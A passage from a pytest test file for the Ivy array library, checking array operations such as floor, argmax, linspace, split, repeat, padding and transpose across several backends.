([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.floormod)
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.floor)
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.ceil)
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.abs)
# argmax
@pytest.mark.parametrize(
"x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# smoke test
x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
axis = x_n_axis_x_argmax[1]
ret = ivy.argmax(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argmax)
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argmin)
# argsort
@pytest.mark.parametrize(
"x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
axis = x_n_axis_x_argsort[1]
ret = ivy.argsort(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (6,)
# value test
assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argsort)
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Number type, or Union for Union[float, int] etc.
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.arange)
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.linspace)
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.logspace)
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.concatenate)
# flip
@pytest.mark.parametrize(
"x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
([[[-0.1471, 0.4477, 0.2214]]], None, None)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# smoke test
x, axis, bs = x_n_axis_n_bs
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.flip(x, axis, bs)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.flip)
# stack
@pytest.mark.parametrize(
"xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# smoke test
(x1, x2), axis = xs_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.stack((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = list(x1.shape)
expected_shape.insert(axis_val, 2)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.stack, (x1, x2), axis),
np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.stack)
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.unstack)
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.split)
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not union of types
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.repeat)
# tile
@pytest.mark.parametrize(
"x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw = x_n_reps
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.tile(x, reps_raw)
reps = ivy.array(reps_raw, 'int32', dev)
ret = ivy.tile(x, reps)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
else:
expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.tile, x, reps),
np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.tile)
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zero_pad)
# fourier_encode
@pytest.mark.parametrize(
"x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
[[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
-8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
-6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
1.0000000e+00]],
[[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
-2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
-1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
1.0000000e+00]],
[[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
-6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
-3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
1.0000000e+00]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# smoke test
x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
if isinstance(max_freq, list):
max_freq = tensor_fn(max_freq, dtype, dev)
ret = ivy.fourier_encode(x, max_freq, num_bands)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else list(x.shape)
expected_shape = x_shape + [1 + 2*num_bands]
assert list(ret.shape) == expected_shape
# value test
assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.fourier_encode)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.constant_pad)
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.swapaxes)
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.transpose)
# expand_dims
@pytest.mark.parametrize(
"x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.expand_dims(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape.insert(axis, 1)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.expand_dims)
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support .type() method
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.where)
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
